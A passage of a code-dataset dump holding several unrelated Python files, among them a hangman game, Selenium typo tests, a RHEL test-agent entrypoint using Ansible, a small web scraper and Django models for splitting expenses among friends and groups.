log.saveImgResults(results, 'train', epoch, iters, nrow=nrow)\n            log.plotCurves(recorder, 'train', epoch=epoch, intv=args.train_disp)\n\n        if args.max_train_iter > 0 and iters >= args.max_train_iter: break\n    opt = {'split': 'train', 'epoch': epoch, 'recorder': recorder}\n    log.printEpochSummary(opt)\n\ndef prepareSave(args, data, pred, recorder, log):\n    results = [data['img'].data, data['m'].data, (data['n'].data+1)/2]\n    if args.s1_est_d:\n        l_acc, data['dir_err'] = eval_utils.calDirsAcc(data['dirs'].data, pred['dirs'].data, args.batch)\n        recorder.updateIter('train', l_acc.keys(), l_acc.values())\n\n    nrow = data['img'].shape[0] if data['img'].shape[0] <= 32 else 32\n    return results, recorder, nrow\n","sub_path":"train_stage1.py","file_name":"train_stage1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"385299833","text":"def lista_rotaciones(palabra):\n    \"\"\"\n\n    :param palabra: a word\n    :return: list of (character) rotations of the word\n    \"\"\"\n\n    lista = [palabra]\n\n    for i in range(len(palabra)-1):\n        temp = palabra[i+1: len(palabra)] + palabra[:i+1]\n        lista.append(temp)\n\n    return lista\n\n\n# execution\nprint(lista_rotaciones(\"rotar\"))\n","sub_path":"Parcialitos/Primero/rotaciones_cadena.py","file_name":"rotaciones_cadena.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"365487796","text":"from .exceptions import *\nfrom random import randint\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\"pineapple\", \"baseball\", \"computers\"]\n\n\ndef _get_random_word(list_of_words):\n    if len(list_of_words) == 0:\n        raise InvalidListOfWordsException(\"The list of words is empty\")\n    \n    rand = 
randint(0, len(list_of_words)-1)\n return list_of_words[rand]\n\n\ndef _mask_word(word):\n if len(word) == 0:\n raise InvalidWordException(\"Your word does not exist\")\n \n masked = len(word) * \"*\"\n return masked\n\n\ndef _uncover_word(answer_word, masked_word, character):\n if len(answer_word) == 0 or len(masked_word) == 0 or len(masked_word) != len(answer_word):\n raise InvalidWordException(\"Your words do not exist or are not the same\")\n \n if len(character) != 1:\n raise InvalidGuessedLetterException(\"Guess with a single character\")\n \n index_list = [i for i, ltr in enumerate(answer_word) if ltr.lower() == character.lower()]\n for i in index_list:\n masked_word = masked_word[:i] + character + masked_word[i+1:]\n return masked_word.lower()\n \n\n\ndef guess_letter(game, letter):\n if game[\"masked_word\"] == game[\"answer_word\"] or game[\"remaining_misses\"] == 0:\n raise GameFinishedException(\"The Game is Already Over!\")\n \n \n if letter.lower() in game[\"answer_word\"] or letter.upper() in game[\"answer_word\"]:\n game[\"masked_word\"] = _uncover_word(game[\"answer_word\"], game[\"masked_word\"], letter)\n \n if game[\"masked_word\"] == game[\"answer_word\"]:\n raise GameWonException(\"You Won!\")\n else:\n game[\"remaining_misses\"] -= 1\n if game[\"remaining_misses\"] == 0:\n raise GameLostException(\"You Lost :(\")\n game[\"previous_guesses\"].append(letter.lower())\n \n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510430754","text":"import unittest\nfrom selenium import webdriver\n\nclass Typo(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://the-internet.herokuapp.com/'\n self.typo_url = self.base_url + 'typos'\n self.driver = webdriver.Chrome(executable_path=r'/Applications/TestFiles/chromedriver')\n\n def test_typo_first_paragraph(self):\n first_paragraph_path = '//*[@id=\"content\"]/div/p[1]'\n # first_paragraph_expected_text = \"This example demonstrates a typo being introduced. It does it randomly on each page load.\"\n driver = self.driver\n driver.get(self.typo_url)\n\n first_parapraph = self.driver.find_element_by_xpath(first_paragraph_path).text\n # self.assertEqual(first_parapraph, first_paragraph_expected_text,\n # f'Houston, we have a typo here! In first paragraph')\n if first_parapraph == \"This example demonstrates a typo being introduced. It does it randomly on each page load.\":\n print('No typos in first paragraph')\n else:\n print(f'Houston, we have a typo here! In the first paragraph: {first_parapraph}')\n\n\n def test_typo_second_paragraph(self):\n second_paragraph_path = '//*[@id=\"content\"]/div/p[2]'\n # second_paragraph_expected_text = \"Sometimes you'll see a typo, other times you won't.\"\n driver = self.driver\n driver.get(self.typo_url)\n\n second_paragraph = driver.find_element_by_xpath(second_paragraph_path).text\n # self.assertEqual(second_paragraph, second_paragraph_expected_text,\n # f'Houston, we have a typo here! 
In second paragraph')\n if second_paragraph == \"Sometimes you'll see a typo, other times you won't.\":\n print('No typos in second paragraph')\n else:\n print(f'Houston, we have a typo here! In the second paragraph: {second_paragraph}')\n\n\n def tearDown(self):\n self.driver.quit()\n\n \"\"\"Both tests may be run twice or 3 times so You can see if indeed there is a typo.\n We can use assertion or If statement\n \"\"\"","sub_path":"features/typo.py","file_name":"typo.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629555078","text":"\"\"\"\nTests for the Flexibiliy environment\n\"\"\"\nimport os\nimport pandas as pd\nimport numpy as np\nfrom energy_py.envs import FlexEnv\n\ndata_path = os.path.join(os.getcwd(), 'data')\n\nenv = FlexEnv(data_path=data_path,\n flex_size=1,\n flex_time=6,\n relax_time=12,\n flex_effy=1.2)\n\nstate = pd.read_csv('data/state.csv', index_col=0, parse_dates=True)\n\nprices = state.values\n\ndef test_down_up():\n o = env.reset()\n rews = []\n for step in range(30):\n\n if step == 5:\n o, r, d, i = env.step(np.array(1).reshape(1, 1))\n\n else:\n o, r, d, i = env.step(np.array(0).reshape(1, 1))\n\n rews.append(r)\n\n expected_rew = (np.sum(prices[5:5+6]) - np.sum(prices[5+6:5+6+6])*1.2) / 12\n assert np.isclose(sum(rews), expected_rew)\n\n\ndef test_up_down():\n o = env.reset()\n rews = []\n for step in range(30):\n\n if step == 6:\n o, r, d, i = env.step(np.array(2).reshape(1, 1))\n\n else:\n o, r, d, i = env.step(np.array(0).reshape(1, 1))\n\n rews.append(r)\n\n expected_rew = (-1.2*np.sum(prices[6:6+6]) + np.sum(prices[6+6:6+12])) / 12\n assert np.isclose(sum(rews), expected_rew)\n\n\nif __name__ == '__main__':\n test_down_up()\n test_up_down()\n","sub_path":"cloudnoreplay/energy_py/tests/test_flex.py","file_name":"test_flex.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634588285","text":"# https://en.wikibooks.org/wiki/Data_Structures/Stacks_and_Queues\n# http://interactivepython.org/courselib/static/pythonds/BasicDS/ImplementingaStackinPython.html\n'''\nImplement the functions of the stack data structure. Stacks are a basic data structure.\nWhen we add an element we say we push it on to the stack.\nWhen we remove (pop) an element from the stack it is aways the top element.\nA real world analogy is a stack of plates in a sink. When we add a new plate its\nis placed on top of the stack, when we wash a plate we always take the one\non top and remove it from the stack. This principle of operation is also\nknown as LIFO (Last In First Out).\nImplement the following functions.\n(a) push(list,x) - Push element x to list. 
Return list.\n(b) pop(list) - Pop top element from list and return it.\n(c) head(list) - Return the top element from list without removing it.\n'''\n\nalex_list = [1, 2, 3, 4, 5]\n\n\ndef push(my_list, x):\n my_list.append(x)\n return my_list\n\n\ndef pop(my_list):\n popped_element = my_list.pop()\n return f\"The popped element is: {popped_element}\"\n\n\ndef head(my_list):\n return my_list[-1]\n\n\npop(alex_list) # Remove the last element (5)\npush(alex_list, 0) # Append 0 at the end of the stack/list\nprint(alex_list) # Printing the list to see what has happened\n# The modifications from the functions are saved !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\nprint(head(alex_list)) # Returns the last element of the list\nprint(pop(alex_list)) # Removes and returns the last element of the list\nprint(alex_list)\n","sub_path":"Python/Python Fundamentals/5.Data Structures and Built-In Functions/3. Programming Questions/Exercise 1 (Stack).py","file_name":"Exercise 1 (Stack).py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102548951","text":"#\n# Shortest Distance to a Character\n#\n# Given a string S and a character C, return an array corresponding to the\n# shortest distance from each index to an index which holds C in S.\n#\n# Joel Rorseth\n#\n\ndef shortestToChar(S, C):\n\n e_indices = [i for i, ch in enumerate(S) if ch == C]\n dist = []\n e_ptr = 0\n pleft = None\n pright = e_indices[e_ptr]\n\n for i in range(len(S)):\n\n if S[i] == C:\n dist.append(0)\n pleft = pright\n e_ptr += 1\n pright = e_indices[e_ptr] if (e_ptr < len(e_indices)) else None\n\n else:\n if pleft == None:\n dist.append(abs(pright-i))\n elif pright == None:\n dist.append(abs(pleft-i))\n else:\n dist.append(min( abs(pleft-i), abs(pright-i) ))\n\n return dist\n\n\n\n\n# Driver\ns = \"abcdeeeefghijklme\"\nc = \"e\"\nprint(\"Given \\\"\" + s + \"\\\" and \\'\" + c + \"\\', shortest distances:\")\nprint(shortestToChar(s,c))\n","sub_path":"shortest_dist_to_char.py","file_name":"shortest_dist_to_char.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"224222309","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nEntrypoint for dci-rhel-agent.\nExample for settings.yml:\nlocal_repo: /var/www/html\nlocal_repo_ip: 192.168.1.1\ntopics:\n - topic: RHEL-7.6\n archs:\n - x86_64\n - ppc64le\n variants:\n - Server\n dci_rhel_agent_cert: false\n dci_rhel_agent_cki: false\n systems:\n - fqdn: labvm-1.novalocal\n kernel_options: \"rd.iscsi.ibft=1\"\n ks_meta: \"ignoredisk=--only-use=sda\"\n sol_command: \"ipmitool -I lanplus -U root -P calvin -H labvm-1.novalocal sol activate\"\n watchdog_timeout: 3600\n - labvm-2.novalocal\n\n - topic: RHEL-8.1\n archs:\n - ppc64le\n variants:\n - BaseOS\n - AppStream\n dci_rhel-agent_cert: false\n dci_rhel-agent_cki: false\n systems:\n - SUT3\n - SUT4\n\"\"\"\nimport ansible_runner\nimport signal\nimport sys\nimport yaml\n\nfrom os import environ\n\nnumber_of_failed_jobs = 0\n\ndef sigterm_handler(signal, frame):\n # This does NOT work with ansible_runner.run_async().\n print('Handle podman stop here !')\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\ndef load_settings():\n with open('/etc/dci-rhel-agent/settings.yml', 'r') as settings:\n try:\n return(yaml.load(settings, Loader=yaml.SafeLoader))\n except yaml.YAMLError as exc:\n print(exc)\n 
sys.exit(1)\n\ndef provision_and_test(extravars):\n # Path is static in the container\n # local_repo = '/var/www/html'\n # extravars['local_repo'] = local_repo\n\n if 'topic' in extravars.keys():\n print (\"Topic is %s\" % extravars['topic'])\n else:\n print (\"Error ! No topic found in settings.\")\n sys.exit(1)\n\n # Provision and install SUT\n if 'systems' not in extravars.keys():\n print ('No hosts found in settings. Please add systems to provision and/or test to your settings file.')\n sys.exit(1)\n\n # Setup conserver if a sol_command exist\n if [system for system in extravars['systems'] if type(system) is dict and 'sol_command' in system.keys()]:\n systems = {'systems' : [system for system in extravars['systems'] if type(system) is dict and 'sol_command' in system.keys()]}\n r = ansible_runner.run(\n private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=1,\n playbook=\"conserver.yml\",\n extravars=systems,\n quiet=False\n )\n if r.rc != 0:\n print (\"Conserver playbook failed. {}: {}\".format(r.status, r.rc))\n sys.exit(1)\n\n threads_runners = {}\n for system in extravars['systems']:\n if type(system) is dict and 'fqdn' in system :\n extravars['fqdn'] = system['fqdn']\n if 'kernel_options' in system:\n extravars['kernel_options'] = system['kernel_options']\n else:\n extravars.pop('kernel_options', None)\n if 'ks_meta' in system:\n extravars['ks_meta'] = system['ks_meta']\n else:\n extravars.pop('ks_meta', None)\n if 'sol_command' in system:\n extravars['sol_command'] = system['sol_command']\n else:\n extravars.pop('sol_command', None)\n if 'sut_password' in system:\n extravars['sut_password'] = system['sut_password']\n else:\n extravars.pop('sut_password', None)\n if 'reboot_watchdog_timeout' in system:\n extravars['reboot_watchdog_timeout'] = system['reboot_watchdog_timeout']\n else:\n extravars.pop('reboot_watchdog_timeout', None)\n if 'install_watchdog_timeout' in system:\n extravars['install_watchdog_timeout'] = system['install_watchdog_timeout']\n else:\n extravars.pop('install_watchdog_timeout', None)\n else:\n extravars['fqdn'] = system\n #Remove any install options set for previous SUTs in this topic if they exist\n extravars.pop('kernel_options', None)\n extravars.pop('ks_meta', None)\n extravars.pop('sol_command', None)\n extravars.pop('reboot_watchdog_timeout', None)\n extravars.pop('install_watchdog_timeout', None)\n print (\"Starting job for %s.\" % extravars['fqdn'])\n thread, runner = ansible_runner.run_async(\n private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=int(environ.get('VERBOSITY')),\n playbook=\"dci-rhel-agent.yml\",\n extravars=extravars,\n quiet=False\n )\n threads_runners[(thread, runner)] = extravars['fqdn']\n\n # wait for all jobs\n for t, _ in threads_runners:\n t.join()\n print(\"All jobs terminated.\")\n\n global number_of_failed_jobs\n # check if some jobs failed\n for t, r in threads_runners:\n fqdn = threads_runners[(t, r)]\n if r.rc != 0:\n print(\"Job for %s failed, rc: %s, status: %s \" % (fqdn, r.rc, r.status))\n number_of_failed_jobs += 1\n\n\ndef main():\n if environ.get('DCI_CLIENT_ID') is None:\n print (\"Environment variable DCI_CLIENT_ID not set.\")\n sys.exit(1)\n\n tests_only = True if environ.get('TESTS_ONLY') == 'True' else False\n\n # Read the settings file\n sets = load_settings()\n\n if not tests_only:\n # Run the update playbook once before jobs.\n r = ansible_runner.run(\n 
private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=1,\n playbook=\"dci-update.yml\",\n extravars=sets,\n quiet=False\n )\n if r.rc != 0:\n print (\"Update playbook failed. {}: {}\".format(r.status, r.rc))\n sys.exit(1)\n # Check if the settings contain multiple topics and process accordingly\n if 'topics' in sets:\n # Break up settings file into individual jobs by topic\n jobs = sets['topics']\n # Loop over each job and provision system(s)\n for idx, current_job in enumerate(jobs):\n print (\"Beginning provision/test jobs for topic %s\" % current_job['topic'])\n current_job['local_repo'] = sets['local_repo']\n current_job['local_repo_ip'] = sets['local_repo_ip']\n current_job['tests_only'] = tests_only\n provision_and_test(current_job)\n else:\n print ('Incompatible settings file. Topics not found. Please update settings file format.')\n sys.exit(1)\n sys.exit(number_of_failed_jobs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dci-rhel-agent/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"264366955","text":"from bs4 import BeautifulSoup\nfrom urllib import request\nurl = \"https://github.com/humanitiesprogramming/scraping-corpus\"\nhtml = request.urlopen(url).read()\nprint(html[0:2000])\nsoup = BeautifulSoup(html, 'lxml')\nprint(soup.find_all('a')[0:10])\nfor item in soup.find_all('a')[0:10]:\n print('=======')\n print(item.text.replace('\\n', ''))\n\nfor link in soup.select(\"td.content a\"):\n print(link.text)\n\nlinks_html = soup.select('td.content a')\nurls = []\nfor link in links_html:\n url = link['href']\n urls.append(url)\nprint(urls)\n\nlinks_html = soup.select('td.content a')\nurls = []\nfor link in links_html:\n url = link['href'].replace('blob/', '')\n urls.append(\"https://raw.githubusercontent.com\" + url)\nprint(urls)\n\ncorpus_texts = []\nfor url in urls:\n print(url)\n html = request.urlopen(url).read()\n soup = BeautifulSoup(html, \"lxml\")\n text = soup.text.replace('\\n', '')\n corpus_texts.append(text)\n\nprint(corpus_texts)\n","sub_path":"python/Scraping.py","file_name":"Scraping.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"356309078","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for adnipy.\"\"\"\n\n__author__ = \"\"\"Maximilian Cosmo Sitter\"\"\"\n__email__ = \"msitter@smail.uni-koeln.de\"\n__version__ = \"0.0.1\"\n\n# Let users know if they're missing any of our hard dependencies\nimport matplotlib\nimport pandas as pd\n\nfrom .adnipy import (\n drop_dynamic,\n get_matching_images,\n groups,\n longitudinal,\n read_csv,\n rid,\n standard_column_names,\n standard_dates,\n standard_index,\n timedelta,\n timepoints,\n)\n\ndel matplotlib, pd\n\n\n# module level doc-string\n__doc__ = \"\"\"Process ADNI study data with adnipy.\"\"\"\n","sub_path":"adnipy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"506766312","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django import forms\n# Create your models here.\n\nclass profile(models.Model):\n\t# name = models.CharField(max_length = 100)\n\t# password = models.CharField(max_length = 
150)\n\tuser = models.OneToOneField(User,on_delete=models.PROTECT)\n\tfirstname = models.CharField(max_length = 100,blank=True,)\n\tsecondname = models.CharField(max_length = 100,blank=True)\n\temail = models.EmailField(default=\"\",blank=True)\n\tnumber = models.IntegerField(default=0,blank=True)\n\tcity = models.CharField(max_length = 100,blank=True)\n\timage = models.ImageField(upload_to='images/',blank=True)\n\tuserid = models.CharField(max_length=100,blank=True,default=\"\")\n\n\tdef __str__(self):\n\t\treturn self.user.username\n\ndef create_profile(sender, **kwargs):\n\tif kwargs['created']:\n\t\tuser_profile = profile.objects.create(user=kwargs['instance'])\n\npost_save.connect(create_profile, sender=User)\n\nclass Friend(models.Model):\n\tusers = models.ManyToManyField(User)\n\tdebt = models.IntegerField(default=0,blank=True)\n\tcurrent_user = models.ForeignKey(User, related_name='owner',null=True,on_delete=models.CASCADE)\n\t@classmethod\n\tdef make_friend(cls,current_user,new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user=current_user\n\t\t)\n\t\tfriend.users.add(new_friend)\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user=new_friend\n\t\t)\n\t\tfriend.users.add(current_user)\n\n\ndef create_friend(sender,**kwargs):\n\tif kwargs['created']:\n\t\t# Create a Friend row for the newly created user (mirrors create_profile above)\n\t\tuser_friends = Friend(current_user=kwargs['instance'])\n\t\tuser_friends.save()\n\npost_save.connect(create_friend, sender=User)\n\nCHOICES=[\n('a','paid by you and split equally'),\n('b','paid by your friend and split equally'),\n('c','You owe him completely'),\n('d','He owes you completely'),\n('e',(\n('1','paid by you and split by shares'),('2','paid by friend and split by shares'),('3','paid by you and split by percentages'),('4','paid by friend and split by percentages'),\n)),\n]\n\n\nclass Transactions(models.Model):\n\tusers = models.ManyToManyField(User)\n\tcurrent_user = models.ForeignKey(User, related_name='owners',null=True,on_delete=models.CASCADE)\n\tamount = models.IntegerField(default=0,blank=True)\n\tpayable = models.IntegerField(default=0,blank=True)\n\tstatus = models.IntegerField(default=0,blank=True)\n\tpair = models.IntegerField(default=0,blank=True)\n\t# net = models.IntegerField(default=0,blank=True)\n\tgroup = models.CharField(default='none',max_length=100)\n\ttype = models.CharField(max_length=10,choices=CHOICES,default='green')\n\tdesc = models.CharField(max_length = 100,blank = False)\n\ttag = models.CharField(max_length = 100,blank = False)\n\tcurrent_user_pk = models.IntegerField(default=0,blank=True)\n\tsplit = models.IntegerField(default=0,blank=True)\n\tamount_you = models.IntegerField(default=0,blank=True)\n\tamount_friend = models.IntegerField(default=0,blank=True)\n\t@classmethod\n\tdef add_transaction(cls,current_user,new_friend,amount,type,desc,tag,split,amount_you,amount_friend):\n\t\tif(type=='a'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn 
tran1.payable\n\n\t\telif(type=='b'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=-amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='c'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=-amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='d'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='e'):\n\t\t\tif(split == 0):\n\t\t\t\tx = int(-amount_friend * amount/100)\n\t\t\telif(split == 1):\n\t\t\t\tx = int(amount_you*amount/100)\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='f'):\n\t\t\tif(split == 0):\n\t\t\t\tx = int(-amount_friend)\n\t\t\telif(split == 1):\n\t\t\t\tx = int(amount_you)\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = 
current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\n# class add_debt(models.Model):\n# \tusers = models.ManyToManyField(User)\n# \tcurrent_user = models.ForeignKey(User, related_name='owners_debts',null=True,on_delete=models.CASCADE)\n# \tdebt_between = models.IntegerField(default=0,blank=True)\n# \t@classmethod\n# \tdef add_debting(cls,current_user,new_friend):\n# \t\tbalance,created = cls.objects.get_or_create(current_user = current_user,users = new_friend)\n# \t\tbalance.users.add(new_friend)\n# \t\tbalance,created = cls.objects.get_or_create(current_user = new_friend , users = current_user)\n# \t\tbalance.users.add(current_user)\nclass Pair(models.Model):\n\tcurrent_user = models.ForeignKey(User, related_name='in_groups',null=True,on_delete=models.CASCADE)\n\tamount = models.IntegerField(default=0,blank=True) \n\nclass Add_group(models.Model):\n\t\n\tGroupName = models.CharField(max_length=100,blank=True)\n\tDescription = models.CharField(max_length = 100,blank=True)\n\t# Tag = models.CharField(max_length = 100,blank=True)\n\tgroup_pk = models.IntegerField(default=0,blank=True) \n\tusers = models.ManyToManyField(Pair)\n\t\n\t@classmethod \n\tdef creating_group(cls,current_user,desc,name,pk):\n\t\tgroup,created = cls.objects.get_or_create(group_pk=pk,Description=desc,GroupName=name)\n\t\tp = Pair(current_user=current_user)\n\t\tp.save()\n\t\tgroup.users.add(p)\n\n\t@classmethod\n\tdef add_member(cls,current_user,pk):\n\t\tgroup,created = cls.objects.get_or_create(group_pk=pk)\n\t\tp = Pair(current_user=current_user)\n\t\tp.save()\n\t\tgroup.users.add(p)\n\t#group = models.ManyToManyField(GroupName)\n\n\tdef __str__(self):\n\t\treturn self.GroupName\n\nclass Group_Transactions(models.Model):\n\tgroup = models.ManyToManyField(Add_group)\n\tadd_group_key = models.IntegerField(default=0,blank=True)\n\tDescription = models.CharField(max_length = 100,blank=True)\n\tTag = models.CharField(max_length = 100,blank=True)\n\tsplit = models.BooleanField(default=True)\n\tamt_paid_by_him = models.CharField(max_length = 10000000,blank=True)\n\tamt_for_him = models.CharField(max_length = 10000000,blank=True,default=\"\")\n\n\t@classmethod\n\tdef add_group_transaction(cls,desc,tag,split,str1,str2,d1,d2,pk):\n\t\tgroup_trans_obj,created = cls.objects.get_or_create(Description=desc,Tag=tag,split=split,amt_paid_by_him=str1,amt_for_him=str2)\n\t\tadd_group_obj = Add_group.objects.get(group_pk=pk)\n\t\tgroup_trans_obj.group.add(add_group_obj)\n\t\tgroup_trans_obj.add_group_key = pk\n\t\td3 = {}\n\t\tgroup_balance = {}\n\t\tg=[]\n\t\tfor key,value in d1.items():\n\t\t\td3[key] = value - d2[key]\n\t\tpairs = add_group_obj.users.all()\n\t\tfor x in pairs:\n\t\t\tk = x.current_user.username\n\t\t\tv = x.amount\n\t\t\tgroup_balance[k] = v + d3[k]\n\t\t\tx.amount = group_balance[k]\n\t\t\tx.save()\n\t\tgroup_trans_obj.save()\n\t\treturn d3\n\n\n\n\t\t# N = len(group_balance)\n\t\t# for key,value in group_balance.items():\n\t\t# \tg = g + [[key,value]]\n\t\t# # g=[[7,-10],[19,-10],[6,20]]\n\t\t# l1=[]\n\t\t# l2=[]\n\t\t# graph=[]\n\t\t# final={}\n\t\t# f={}\n\t\t# j=0\n\t\t# for i in g:\n\t\t# \tfinal[i[0]]=j\n\t\t# \tf[j]=final[i[0]]\n\t\t# \tj=j+1\n\t\t# for i in range(N):\n\t\t# \tl3=[]\n\t\t# \tfor j in range(N):\n\t\t# \t\tl3=l3+[0]\n\t\t# \tgraph=graph+[l3]\n\t\t# for i in g:\n\t\t# \tif(i[1] == 0):\n\t\t# \t\tcontinue\n\t\t# \telif(i[1] > 0):\n\t\t# \t\tl1=l1+[i]\n\t\t# \telse:\n\t\t# \t\tl2=l2+[i]\n\t\t\n\t\t# def simplify(li1,li2,graph):\n\t\t# \tif(len(li1) == 0 or len(li2) == 0):\n\t\t# 
